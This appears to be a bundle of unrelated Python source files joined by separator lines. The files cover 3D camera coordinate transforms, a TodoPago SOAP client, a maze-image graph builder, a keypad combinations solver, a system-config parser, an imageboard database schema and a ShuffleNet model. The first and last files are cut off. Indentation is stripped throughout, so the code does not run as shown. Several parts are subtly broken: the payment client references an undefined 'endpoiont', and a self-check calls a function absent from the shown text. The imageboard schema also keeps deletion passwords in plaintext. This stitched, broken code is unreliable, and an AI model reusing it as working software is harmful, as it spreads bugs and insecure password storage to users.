campix = self.world2campix(self.cam3d2world(cam3d))
else:
if 'K' in self.camera:
campix = self.transform(self.camera['K'], cam3d)
else:
campix = self.camrad2pix(self.cam3d2rad(cam3d))
return campix
def campix23d(self, campix, dis=None):
if isinstance(campix, dict) and dis is None:
cam3d = self.world2cam3d(self.campix2world(campix, dis))
else:
cam3d = self.camrad23d(self.campix2rad(campix), dis)
return cam3d
@staticmethod
def transform(transform_matrix, input):
"""
Transform 3D points or 3D bounding boxes with given transformation matrix.
Parameters
----------
transform_matrix: 4 x 4 transformation matrix
input: n x 3 numpy array or bdb3d dict or Trimesh
Returns
-------
n x 3 numpy array or bdb3d dict
"""
if isinstance(input, trimesh.Trimesh):
input = input.copy()
input.vertices = IGTransform.transform(transform_matrix, input.vertices)
return input
elif isinstance(input, dict):
size = input['size']
if isinstance(size, torch.Tensor):
size = size.clone()
else:
size = size.copy()
output = {
'centroid': IGTransform.transform(transform_matrix, input['centroid']),
'basis': transform_matrix[..., :3, :3] @ input['basis'],
'size': size
}
else:
output = IGTransform.homotrans(transform_matrix, input)
return output
def world2cam3d(self, world):
"""
Transform 3D points or 3D bounding boxes from world coordinate frame to camera coordinate frame.
world: right-hand coordinate of iGibson (z-up)
cam3d: x-right, y-down, z-forward
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
n x 3 numpy array or bdb3d dict
"""
return self.transform(self['world2cam3d'], world)
def cam3d2world(self, cam3d):
return self.transform(self['cam3d2world'], cam3d)
def ori2basis(self, ori, center=None):
if isinstance(ori, dict):
if isinstance(ori['size'], torch.Tensor):
if 'centroid' in ori:
centroid = ori['centroid'].clone()
size = ori['size'].clone()
centroid_total3d = ori['centroid_total3d'].clone()
else:
if 'centroid' in ori:
centroid = ori['centroid'].copy()
centroid_total3d = ori['centroid_total3d'].copy()
size = ori['size'].copy()
if 'centroid_total3d' in ori and 'K' in self.camera:
trans_centered = self.copy()
trans_centered.set_camera_like_total3d()
centroid_cam3d = trans_centered.world2cam3d(centroid_total3d)
centroid = self.cam3d2world(centroid_cam3d)
basis = {
'basis': self.ori2basis(ori['ori']),
'centroid': centroid,
'centroid_total3d': centroid_total3d,
'size': size
}
else:
backend = torch if isinstance(ori, torch.Tensor) else np
cam_yaw, _, _ = self.get_camera_angle()
if 'K' in self.camera:
yaw = cam_yaw - ori
else:
lon = self.campix2rad(center)[..., 0]
yaw = cam_yaw - lon - ori # ori and lon are counter-clockwise about z axis (from above)
yaw += np.pi / 2 # z axis of the camera rotates from x axis of the world coordinate
if isinstance(yaw, torch.Tensor):
basis = torch.zeros((len(yaw), 3, 3), device=yaw.device)
else:
basis = np.zeros((3, 3), dtype=np.float32)
basis[..., 0, 0] = backend.cos(yaw)
basis[..., 0, 1] = - backend.sin(yaw)
basis[..., 1, 0] = backend.sin(yaw)
basis[..., 1, 1] = backend.cos(yaw)
basis[..., 2, 2] = 1
return basis
def campix2world(self, campix, dis=None):
if isinstance(campix, dict):
if isinstance(campix['size'], torch.Tensor):
size = campix['size'].clone()
else:
size = campix['size'].copy()
world = {
'centroid': self.campix2world(campix['center'], campix['dis']),
'basis': self.ori2basis(campix['ori'], campix.get('center')),
'size': size
}
else:
world = self.cam3d2world(self.campix23d(campix, dis=dis))
return world
def basis2ori(self, basis, centroid=None):
"""
Transform basis to ori based on different definitions of ori for panoramic and perspective image.
Orientation: Defined as the left-handed rotation from line_of_sight to forward vector of object
around up axis of the world frame.
line_of_sight: For panoramic image, is defined as the direction from camera center to object centroid.
For perspective image, is defined as the direction of camera forward.
Parameters
----------
basis: Basis rotation matrix or bdb3d dict
centroid: For panoramic image, the centroid of object is required
Returns
-------
Orientation in rad or bdb3d dict.
When output bdb3d, it will also include a parameter 'centroid_total3d',
indicating the centroid of bdb3d in Total3D frame
"""
if isinstance(basis, dict):
if isinstance(basis['size'], torch.Tensor):
if 'centroid_total3d' in basis:
centroid_total3d = basis['centroid_total3d'].clone()
centroid = basis['centroid'].clone()
size = basis['size'].clone()
else:
if 'centroid_total3d' in basis:
centroid_total3d = basis['centroid_total3d'].copy()
centroid = basis['centroid'].copy()
size = basis['size'].copy()
if 'centroid' in basis and 'K' in self.camera:
trans_centered = self.copy()
trans_centered.set_camera_like_total3d()
centroid_cam3d = self.world2cam3d(centroid)
centroid_total3d = trans_centered.cam3d2world(centroid_cam3d)
ori = {
'ori': self.basis2ori(basis['basis']),
'centroid': centroid,
'centroid_total3d': centroid_total3d,
'size': size
}
else:
obj_forward = bdb3d_axis({'basis': basis})
if 'K' in self.camera:
# use the definition of orientation in Total3D
line_of_sight = self.camera['target'] - self.camera['pos']
else:
line_of_sight = centroid - self.camera['pos']
ori = vector_rotation(
line_of_sight, obj_forward, bdb3d_axis({'basis': basis}, 'up'),
left_hand=True, range_pi=True
)
return ori
def world2campix(self, world):
"""
Transform 3D points or 3D bounding boxes from world coordinate to pixel coordinate.
Parameters
----------
world: n x 3 numpy array or bdb3d dict
Returns
-------
for 3D points: n x 2 numpy array of xy in pixel.
x: (left) 0 --> width - 1 (right)
y: (up) 0 --> height - 1 (down)
for 3D bounding boxes: dict{
'centroid': centroid projected to camera plane
'size': original bounding box size
'dis': distance from centroid to camera in meters
'depth': depth of centroid
'ori': orientation of object in rad clockwise to line of sight (from above), [0, 2 * pi]
}
"""
if isinstance(world, dict):
if isinstance(world['size'], torch.Tensor):
backend = torch
size = world['size'].clone()
else:
backend = np
size = world['size'].copy()
cam3d_centroid = self.world2cam3d(world['centroid'])
campix = {
'center': self.cam3d2pix(cam3d_centroid),
'size': size,
'dis': backend.linalg.norm(cam3d_centroid, axis=-1),
'depth': cam3d_centroid[..., -1],
'ori': self.basis2ori(world['basis'], world['centroid'])
}
else:
campix = self.cam3d2pix(self.world2cam3d(world))
return campix
@staticmethod
def homotrans(M, p):
if isinstance(M, torch.Tensor):
if p.shape[-1] == M.shape[1] - 1:
p = torch.cat([p, torch.ones_like(p[..., :1], device=p.device)], -1)
if p.dim() <= 2:
p = p.unsqueeze(-2)
p = torch.matmul(M, p.transpose(-1, -2)).transpose(-1, -2).squeeze(-2)
return p[..., :-1] / p[..., -1:]
else:
return homotrans(M, p)
@staticmethod
def obj2frame(obj, bdb3d):
"""
Transform 3D points or Trimesh from normalized object coordinate frame to coordinate frame bdb3d is in.
object: x-left, y-back, z-up (defined by iGibson)
world: right-hand coordinate of iGibson (z-up)
Parameters
----------
obj: n x 3 numpy array or Trimesh
bdb3d: dict, self['objs'][id]['bdb3d']
Returns
-------
n x 3 numpy array or Trimesh
"""
if isinstance(obj, trimesh.Trimesh):
obj = obj.copy()
normalized_vertices = normalize_to_unit_square(obj.vertices, keep_ratio=False)[0]
obj_vertices = normalized_vertices / 2
obj.vertices = IGTransform.obj2frame(obj_vertices, bdb3d)
return obj
if isinstance(obj, torch.Tensor):
size = bdb3d['size'].unsqueeze(-2)
centroid = bdb3d['centroid'].unsqueeze(-2)
return (bdb3d['basis'] @ (obj * size).transpose(-1, -2)).transpose(-1, -2) + centroid
else:
return (bdb3d['basis'] @ (obj * bdb3d['size']).T).T + bdb3d['centroid']
@staticmethod
def frame2obj(point, bdb3d):
return (bdb3d['basis'].T @ (point - bdb3d['centroid']).T).T / bdb3d['size']
def obj2cam3d(self, obj, bdb3d):
return self.world2cam3d(self.obj2frame(obj, bdb3d))
def cam3d2obj(self, cam3d, bdb3d):
return self.frame2obj(self.cam3d2world(cam3d), bdb3d)
def __getitem__(self, item):
value = self.camera[item]
if self.split == 'layout':
return value
if isinstance(value, torch.Tensor) and self.data \
and self.split in self.data and 'split' in self.data[self.split].keys():
expanded = []
for t, s in zip(value, self.data[self.split]['split']):
expanded.append(t.unsqueeze(0).expand([s[1] - s[0]] + list(t.shape)))
return torch.cat(expanded)
return value
def in_cam(self, point, frame='world'):
if frame == 'world':
point = self.world2cam3d(point)
depth = point[..., -1]
point = self.cam3d2pix(point)
elif frame == 'cam3d':
depth = point[..., -1]
point = self.cam3d2pix(point)
elif frame != 'campix':
raise NotImplementedError
in_cam = np.all(
(point <= np.array([self.camera['width'], self.camera['height']]) - 0.5)
& (point >= -0.5), axis=-1
)
if frame in ('world', 'cam3d'):
in_cam = (depth > 0) & in_cam
return in_cam
def rotate_layout_like_total3d(self, layout_bdb3d):
        # Rotate the layout's forward vector by multiples of pi/2
        # so that its dot product with the camera forward vector is maximal.
layout_front = bdb3d_axis(layout_bdb3d)
cam_front = cam_axis(self.camera)
rot_90 = np.array([[0, 1, 0], [-1, 0, 0], [0, 0, 1]])
rot_matrices = [np.linalg.matrix_power(rot_90, i) for i in range(4)]
rotated_layout_fronts = [rot @ layout_front for rot in rot_matrices]
dot_products = [f @ cam_front for f in rotated_layout_fronts]
i_rot = np.argmax(dot_products)
rot_matrix = rot_matrices[i_rot]
layout = {
'centroid': layout_bdb3d['centroid'].copy(),
'size': np.abs(rot_matrix) @ layout_bdb3d['size'],
'basis': rot_matrix @ layout_bdb3d['basis']
}
return layout
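# Minimal self-check sketch for bdb3d_corners (illustrative only; relies on this
# module's own imports, e.g. numpy as np).
if __name__ == '__main__':
    _unit_box = {
        'centroid': np.zeros(3, dtype=np.float32),
        'basis': np.eye(3, dtype=np.float32),
        'size': np.ones(3, dtype=np.float32),
    }
    # An axis-aligned unit cube at the origin should yield corners at +/-0.5
    # along each axis, in the order documented in bdb3d_corners.
    print(bdb3d_corners(_unit_box))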
|
from zeep import Client, Settings
from zeep.cache import SqliteCache
from zeep.transports import Transport
wsdl = "python_todopago/wsdl/Authorize.wsdl"
ENDPOINTS = {
True: "https://developers.todopago.com.ar/services/t/1.1/",
False: "https://apis.todopago.com.ar/services/t/1.1/",
}
def get_client(token: str, sandbox: bool = False) -> Client:
    endpoint = ENDPOINTS[sandbox]
settings = Settings(extra_http_headers={"Authorization": token})
transport = Transport(cache=SqliteCache(timeout=86400))
client = Client(
endpoiont + "Authorize?wsdl",
settings=settings,
transport=transport,
)
    client.service._binding_options["address"] = endpoint + "Authorize"
return client
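# Illustrative usage sketch (not executed; the token value and the operation call
# are placeholders, not verified against the TodoPago documentation):
#
#   client = get_client(api_token, sandbox=True)
#   # operations exposed by the WSDL can then be invoked via client.service.<Operation>(...)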
|
#global variables for modules
#node labels
user_label = "User"
#relationship types
request_rel_type = "REQUESTED"
friend_rel_type = "FRIENDS"
#node property keys
time_key = "Time"
name_key = "Name"
mekid_key = "Mekid"
#node property values
no_network_value = 0
#relationship properties
req_accept = "accept"
req_decline = "decline"
#networks
fb_key = "Facebook"
twit_key = "Twitter"
ig_key = "Instagram"
sc_key = "Snapchat"
networks = [fb_key, twit_key, ig_key, sc_key]
#REST API
#rest api json return keys
json_type = "type"
json_msg = "msg"
#rest api json return values
json_error = "Error"
json_success = "OK"
#errors
unknown_error_message = "Something went wrong! Please try again later."
|
class Maze:
class Node:
def __init__(self, position):
self.Position = position
self.Neighbours = [None, None, None, None]
#self.Weights = [0, 0, 0, 0]
def __init__(self, im):
width = im.width
height = im.height
data = list(im.getdata(0))
self.start = None
self.end = None
# Top row buffer
topnodes = [None] * width
count = 0
# Start row
for x in range (1, width - 1):
if data[x] > 0:
self.start = Maze.Node((0,x))
topnodes[x] = self.start
count += 1
break
for y in range (1, height - 1):
#print ("row", str(y)) # Uncomment this line to keep a track of row progress
rowoffset = y * width
rowaboveoffset = rowoffset - width
rowbelowoffset = rowoffset + width
# Initialise previous, current and next values
prv = False
cur = False
nxt = data[rowoffset + 1] > 0
leftnode = None
for x in range (1, width - 1):
# Move prev, current and next onwards. This way we read from the image once per pixel, marginal optimisation
prv = cur
cur = nxt
nxt = data[rowoffset + x + 1] > 0
n = None
if cur == False:
# ON WALL - No action
continue
if prv == True:
if nxt == True:
# PATH PATH PATH
# Create node only if paths above or below
if data[rowaboveoffset + x] > 0 or data[rowbelowoffset + x] > 0:
n = Maze.Node((y,x))
leftnode.Neighbours[1] = n
n.Neighbours[3] = leftnode
leftnode = n
else:
# PATH PATH WALL
# Create path at end of corridor
n = Maze.Node((y,x))
leftnode.Neighbours[1] = n
n.Neighbours[3] = leftnode
leftnode = None
else:
if nxt == True:
# WALL PATH PATH
# Create path at start of corridor
n = Maze.Node((y,x))
leftnode = n
else:
# WALL PATH WALL
# Create node only if in dead end
if (data[rowaboveoffset + x] == 0) or (data[rowbelowoffset + x] == 0):
#print ("Create Node in dead end")
n = Maze.Node((y,x))
# If node isn't none, we can assume we can connect N-S somewhere
if n != None:
# Clear above, connect to waiting top node
if (data[rowaboveoffset + x] > 0):
t = topnodes[x]
t.Neighbours[2] = n
n.Neighbours[0] = t
# If clear below, put this new node in the top row for the next connection
if (data[rowbelowoffset + x] > 0):
topnodes[x] = n
else:
topnodes[x] = None
count += 1
# End row
rowoffset = (height - 1) * width
for x in range (1, width - 1):
if data[rowoffset + x] > 0:
self.end = Maze.Node((height - 1,x))
t = topnodes[x]
t.Neighbours[2] = self.end
self.end.Neighbours[0] = t
count += 1
break
self.count = count
self.width = width
self.height = height
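if __name__ == '__main__':
    # Illustrative usage (assumes Pillow is installed and that 'maze.png' is a
    # placeholder path to a black/white maze image with walls as dark pixels,
    # a single entrance on the top row and a single exit on the bottom row).
    from PIL import Image
    im = Image.open('maze.png')
    maze = Maze(im)
    print("nodes:", maze.count)
    print("start:", maze.start.Position, "end:", maze.end.Position)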
|
KEYBOARD = {
'0': ' ',
'1': '',
'2': 'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz'}
class Solution:
"""
    @param digits: A digit string
    @return: all possible letter combinations
    DFS. Time: O(4^n), Space: O(4^n + n)
"""
def letterCombinations(self, digits):
if not digits:
return []
results = []
self.dfs(digits, 0, [], results)
return results
def dfs(self, digits, index, chars, results):
if index == len(digits):
results.append(''.join(chars))
return
for letter in KEYBOARD[digits[index]]:
chars.append(letter)
self.dfs(digits, index + 1, chars, results)
chars.pop()
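if __name__ == '__main__':
    # Quick illustration: "23" expands to the 9 combinations of {a,b,c} x {d,e,f}.
    print(Solution().letterCombinations("23"))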
|
from interpreter.CopperInterpreter import *
|
#!/bin/env python
##
# Copyright(c) 2010-2015 Intel Corporation.
# Copyright(c) 2016-2018 Viosoft Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
class SystemConfig:
_user = None
_ip = None
_proxDir = None
_cfgFile = None
    @classmethod
    def fromParams(cls, user, ip, proxDir, configDir):
        # Formerly a duplicate __init__, which Python silently discarded in favour
        # of the string-parsing __init__ below; kept as an alternative constructor.
        return cls(user + "@" + ip + ":" + proxDir + ":" + configDir);
def __init__(self, text):
self._user = text.split("@")[0];
text = text.split("@")[1];
self._ip = text.split(":")[0];
self._proxDir = text.split(":")[1];
self._cfgFile = text.split(":")[2];
def getUser(self):
return self._user;
def getIP(self):
return self._ip;
def getProxDir(self):
return self._proxDir;
def getCfgFile(self):
return self._cfgFile;
@staticmethod
def checkSyntax(text):
split = text.split("@");
if (len(split) != 2):
return SystemConfig.getSyntaxError(text);
after = split[1].split(":");
if (len(after) != 3):
return SystemConfig.getSyntaxError(text);
return ""
def toString(self):
ret = "";
ret += " " + self._user + "@" + self._ip + "\n"
ret += " " + "prox dir: " + self._proxDir + "\n"
ret += " " + "cfg dir: " + self._cfgFile + "\n"
return ret;
@staticmethod
def getSyntaxError(text):
ret = "Invaild system syntax"
ret += ", got: " + str(text)
ret += ", expected: " + str(SystemConfig.expectedSyntax())
return ret;
@staticmethod
def expectedSyntax():
return "user@ip:proxDir:cfgFile"
|
import config, config_defaults
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, Text, String, MetaData
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import func
# needed by other modules
from sqlalchemy.exc import OperationalError
pool_opts = {}
if config.SQL_POOLING:
pool_opts = {
'pool_size': config.SQL_POOL_SIZE,
'max_overflow': config.SQL_POOL_MAX_OVERFLOW,
}
engine = create_engine(config.SQL_ENGINE, **pool_opts)
Session = scoped_session(sessionmaker(bind=engine))
metadata = MetaData()
_boards = {}
def board(name):
'''Generates board table objects'''
if name in _boards:
return _boards[name]
table = Table(name, metadata,
Column("num", Integer, primary_key=True), # Post number, auto-increments
Column("parent", Integer), # Parent post for replies in threads. For original posts, must be set to 0 (and not null)
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("lasthit", Integer), # Last activity in thread. Must be set to the same value for BOTH the original post and all replies!
Column("ip", Text), # IP number of poster, in integer form!
Column("date", Text), # The date, as a string
Column("name", Text(convert_unicode=True)), # Name of the poster
Column("trip", Text), # Tripcode (encoded)
Column("email", Text(convert_unicode=True)), # Email address
Column("subject", Text(convert_unicode=True)), # Subject
Column("password", Text), # Deletion password (in plaintext)
Column("comment", Text(convert_unicode=True)), # Comment text, HTML encoded.
Column("image", Text(convert_unicode=True)), # Image filename with path and extension (IE, src/1081231233721.jpg)
Column("size", Integer), # File size in bytes
Column("md5", Text), # md5 sum in hex
Column("width", Integer), # Width of image in pixels
Column("height", Integer), # Height of image in pixels
Column("thumbnail", Text), # Thumbnail filename with path and extension
Column("tn_width", Text), # Thumbnail width in pixels
Column("tn_height", Text), # Thumbnail height in pixels
Column("lastedit", Text), # ADDED - Date of previous edit, as a string
Column("lastedit_ip", Text), # ADDED - Previous editor of the post, if any
Column("admin_post", Text), # ADDED - Admin post?
# TODO: Probably should make this Boolean. Keeping as int for now to maintain compatibility with sorting functions.
Column("stickied", Integer), # ADDED - Stickied?
Column("locked", Text) # ADDED - Locked?
)
table.create(bind=engine, checkfirst=True)
_boards[name] = table
return _boards[name]
admin = Table(config.SQL_ADMIN_TABLE, metadata,
Column("num", Integer, primary_key=True), # Entry number, auto-increments
Column("type", Text), # Type of entry (ipban, wordban, etc)
Column("comment", Text(convert_unicode=True)), # Comment for the entry
Column("ival1", Text), # Integer value 1 (usually IP)
Column("ival2", Text), # Integer value 2 (usually netmask)
Column("sval1", Text), # String value 1
Column("total", Text), # ADDED - Total Ban?
Column("expiration", Integer) # ADDED - Ban Expiration?
)
proxy = Table(config.SQL_PROXY_TABLE, metadata,
Column("num", Integer, primary_key=True), # Entry number, auto-increments
Column("type", Text), # Type of entry (black, white, etc)
Column("ip", Text), # IP address
Column("timestamp", Integer), # Age since epoch
Column("date", Text) # Human-readable form of date
)
account = Table(config.SQL_ACCOUNT_TABLE, metadata,
Column("username", String(25), primary_key=True), # Name of user--must be unique
Column("account", Text, nullable=False), # Account type/class: mod, globmod, admin
Column("password", Text, nullable=False), # Encrypted password
Column("reign", Text), # List of board (tables) under jurisdiction: globmod and admin have global power and are exempt
Column("disabled", Integer) # Disabled account?
)
activity = Table(config.SQL_STAFFLOG_TABLE, metadata,
Column("num", Integer, primary_key=True), # ID
Column("username", String(25), nullable=False), # Name of moderator involved
Column("action", Text), # Action performed: post_delete, admin_post, admin_edit, ip_ban, ban_edit, ban_remove
Column("info", Text), # Information
Column("date", Text), # Date of action
Column("ip", Text), # IP address of the moderator
Column("admin_id", Integer), # For associating certain entries with the corresponding key on the admin table
Column("timestamp", Integer) # Timestamp, for trimming
)
common = Table(config.SQL_COMMON_SITE_TABLE, metadata,
Column("board", String(25), primary_key=True), # Name of comment table
Column("type", Text) # Corresponding board type? (Later use)
)
report = Table(config.SQL_REPORT_TABLE, metadata,
Column("num", Integer, primary_key=True), # Report number, auto-increments
Column("board", String(25), nullable=False), # Board name
Column("reporter", Text, nullable=False), # Reporter's IP address (decimal encoded)
Column("offender", Text), # IP Address of the offending poster. Why the form-breaking redundancy with SQL_TABLE? If a post is deleted by the perpetrator, the trace is still logged. :)
Column("postnum", Integer, nullable=False), # Post number
Column("comment", Text(convert_unicode=True),
nullable=False), # Mandated reason for the report.
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("date", Text), # Date of the report
Column("resolved", Integer) # Is it resolved? (1: yes 0: no)
)
backup = Table(config.SQL_BACKUP_TABLE, metadata,
Column("num", Integer, primary_key=True), # Primary key, auto-increments
Column("board_name", String(25), nullable=False), # Board name
Column("postnum", Integer), # Post number
Column("parent", Integer), # Parent post for replies in threads. For original posts, must be set to 0 (and not null)
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("lasthit", Integer), # Last activity in thread. Must be set to the same value for BOTH the original post and all replies!
Column("ip", Text), # IP number of poster, in integer form!
Column("date", Text), # The date, as a string
Column("name", Text(convert_unicode=True)), # Name of the poster
Column("trip", Text), # Tripcode (encoded)
Column("email", Text), # Email address
Column("subject", Text(convert_unicode=True)), # Subject
Column("password", Text), # Deletion password (in plaintext)
Column("comment", Text(convert_unicode=True)), # Comment text, HTML encoded.
Column("image", Text(convert_unicode=True)), # Image filename with path and extension (IE, src/1081231233721.jpg)
Column("size", Integer), # File size in bytes
Column("md5", Text), # md5 sum in hex
Column("width", Integer), # Width of image in pixels
Column("height", Integer), # Height of image in pixels
Column("thumbnail", Text), # Thumbnail filename with path and extension
Column("tn_width", Text), # Thumbnail width in pixels
Column("tn_height", Text), # Thumbnail height in pixels
Column("lastedit", Text), # ADDED - Date of previous edit, as a string
Column("lastedit_ip", Text), # ADDED - Previous editor of the post, if any
Column("admin_post", Text), # ADDED - Admin post?
Column("stickied", Integer), # ADDED - Stickied?
Column("locked", Text), # ADDED - Locked?
Column("timestampofarchival", Integer) # When was this backed up?
)
passprompt = Table(config.SQL_PASSPROMPT_TABLE, metadata,
Column("id", Integer, primary_key=True),
Column("host", Text),
Column("task", String(25)),
Column("boardname", String(25)),
Column("post", Integer),
Column("timestamp", Integer),
Column("passfail", Integer)
)
class Page(object):
'''Pagination class: Given an SQL query and pagination information,
produce only the relevant rows. N.B.: The board.Board class uses
different pagination logic.'''
def __init__(self, query, page_num, per_page):
assert str(page_num).isdigit() and page_num > 0,\
'Invalid page number.'
assert str(per_page).isdigit() and per_page > 0,\
'Invalid page entry count.'
self.num = page_num
if per_page > 200:
self.per_page = 200
else:
self.per_page = per_page
self.offset = (page_num - 1) * self.per_page
session = Session()
count = query.column(func.count())
self.total_entries = session.execute(count).fetchone()['count_1']
        row_proxies = session.execute(query.limit(self.per_page)\
                                      .offset(self.offset))
self.rows = [dict(row.items()) for row in row_proxies]
self.total_pages = (self.total_entries + self.per_page - 1)\
/ self.per_page
if self.total_pages == 0:
self.total_pages = 1
if self.total_pages < self.num:
self.num = self.total_pages
# Quick fix for 'board' -> 'board_name' column renaming.
if self.rows:
ren_board = 'board' in self.rows[0].keys()
row_ctr = row_cycle = 1
for row in self.rows:
row_cycle ^= 0x3
row['rowtype'] = row_cycle
row['entry_number'] = row_ctr
if ren_board:
                    row['board_name'] = row['board']
                row_ctr += 1
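if __name__ == '__main__':
    # Illustrative sketch (assumes config.SQL_ENGINE points at a reachable database
    # and that creating/fetching a board table named 'demo' is acceptable).
    demo = board('demo')
    page = Page(demo.select().order_by(demo.c.num.desc()), 1, 20)
    print("%d posts, %d pages" % (page.total_entries, page.total_pages))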
|
import tensorflow as tf
import math
from .CONSTANTS import BATCH_NORM_MOMENTUM, N_SHUFFLE_UNITS, FIRST_STRIDE
def _channel_shuffle(X, groups):
height, width, in_channels = X.shape.as_list()[1:]
in_channels_per_group = int(in_channels/groups)
# reshape
shape = tf.stack([-1, height, width, groups, in_channels_per_group])
X = tf.reshape(X, shape)
# transpose
X = tf.transpose(X, [0, 1, 2, 4, 3])
# reshape
shape = tf.stack([-1, height, width, in_channels])
X = tf.reshape(X, shape)
return X
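# e.g. with in_channels=6 and groups=3 (channel groups [0,1], [2,3], [4,5]),
# the output channel order is [0, 2, 4, 1, 3, 5]: every output block now draws
# one channel from each input group.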
def _mapping(
X, is_training, num_classes=200,
groups=3, dropout=0.5,
complexity_scale_factor=0.75):
"""A ShuffleNet implementation.
Arguments:
X: A float tensor with shape [batch_size, image_height, image_width, 3].
is_training: A boolean, whether the network is in the training mode.
num_classes: An integer.
groups: An integer, number of groups in group convolutions,
only possible values are: 1, 2, 3, 4, 8.
        dropout: A float number, dropout rate before the last linear layer.
        complexity_scale_factor: A float number, to customize the network
to a desired complexity you can apply a scale factor,
in the original paper they are considering
scale factor values: 0.25, 0.5, 1.0.
It determines the width of the network.
Returns:
A float tensor with shape [batch_size, num_classes].
"""
# 'out_channels' equals to second stage's number of output channels
if groups == 1:
out_channels = 144
elif groups == 2:
out_channels = 200
elif groups == 3:
out_channels = 240
elif groups == 4:
out_channels = 272
elif groups == 8:
out_channels = 384
# all 'out_channels' are divisible by corresponding 'groups'
# if you want you can decrease network's width
out_channels = int(out_channels * complexity_scale_factor)
with tf.variable_scope('features'):
with tf.variable_scope('stage1'):
with tf.variable_scope('conv1'):
result = _conv(X, 24, kernel=3, stride=FIRST_STRIDE)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
# in the original paper they are not using batch_norm and relu here
result = _max_pooling(result)
with tf.variable_scope('stage2'):
with tf.variable_scope('unit1'):
result = _first_shufflenet_unit(
result, is_training, groups, out_channels
)
for i in range(N_SHUFFLE_UNITS[0]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is out_channels
with tf.variable_scope('stage3'):
with tf.variable_scope('unit1'):
result = _shufflenet_unit(result, is_training, groups, stride=2)
for i in range(N_SHUFFLE_UNITS[1]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is 2*out_channels
with tf.variable_scope('stage4'):
with tf.variable_scope('unit1'):
result = _shufflenet_unit(result, is_training, groups, stride=2)
for i in range(N_SHUFFLE_UNITS[2]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is 4*out_channels
with tf.variable_scope('classifier'):
result = _global_average_pooling(result)
result = _dropout(result, is_training, dropout)
# in the original paper they are not using dropout here
logits = _affine(result, num_classes)
return logits
def _nonlinearity(X):
return tf.nn.relu(X, name='ReLU')
def _dropout(X, is_training, rate=0.5):
keep_prob = tf.constant(
1.0 - rate, tf.float32,
[], 'keep_prob'
)
result = tf.cond(
is_training,
lambda: tf.nn.dropout(X, keep_prob),
lambda: tf.identity(X),
name='dropout'
)
return result
def _batch_norm(X, is_training):
return tf.layers.batch_normalization(
X, scale=False, center=True,
momentum=BATCH_NORM_MOMENTUM,
training=is_training, fused=True
)
def _global_average_pooling(X):
return tf.reduce_mean(
X, axis=[1, 2],
name='global_average_pooling'
)
def _max_pooling(X):
return tf.nn.max_pool(
X, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME',
name='max_pooling'
)
def _avg_pooling(X):
return tf.nn.avg_pool(
X, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME',
name='avg_pooling'
)
def _conv(X, filters, kernel=3, stride=1):
in_channels = X.shape.as_list()[-1]
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels)
K = tf.get_variable(
'kernel', [kernel, kernel, in_channels, filters],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
b = tf.get_variable(
'bias', [filters], tf.float32,
tf.zeros_initializer()
)
return tf.nn.bias_add(
tf.nn.conv2d(X, K, [1, stride, stride, 1], 'SAME'), b
)
def _group_conv(X, filters, groups, kernel=1, stride=1):
in_channels = X.shape.as_list()[3]
in_channels_per_group = int(in_channels/groups)
filters_per_group = int(filters/groups)
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels_per_group)
K = tf.get_variable(
'kernel', [kernel, kernel, in_channels_per_group, filters],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
# split channels
X_channel_splits = tf.split(X, [in_channels_per_group]*groups, axis=3)
K_filter_splits = tf.split(K, [filters_per_group]*groups, axis=3)
results = []
# do convolution for each split
for i in range(groups):
X_split = X_channel_splits[i]
K_split = K_filter_splits[i]
results += [tf.nn.conv2d(X_split, K_split, [1, stride, stride, 1], 'SAME')]
return tf.concat(results, 3)
def _depthwise_conv(X, kernel=3, stride=1):
in_channels = X.shape.as_list()[3]
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels)
W = tf.get_variable(
'depthwise_kernel', [kernel, kernel, in_channels, 1],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
return tf.nn.depthwise_conv2d(X, W, [1, stride, stride, 1], 'SAME')
def _shufflenet_unit(X, is_training, groups=3, stride=1):
in_channels = X.shape.as_list()[3]
result = X
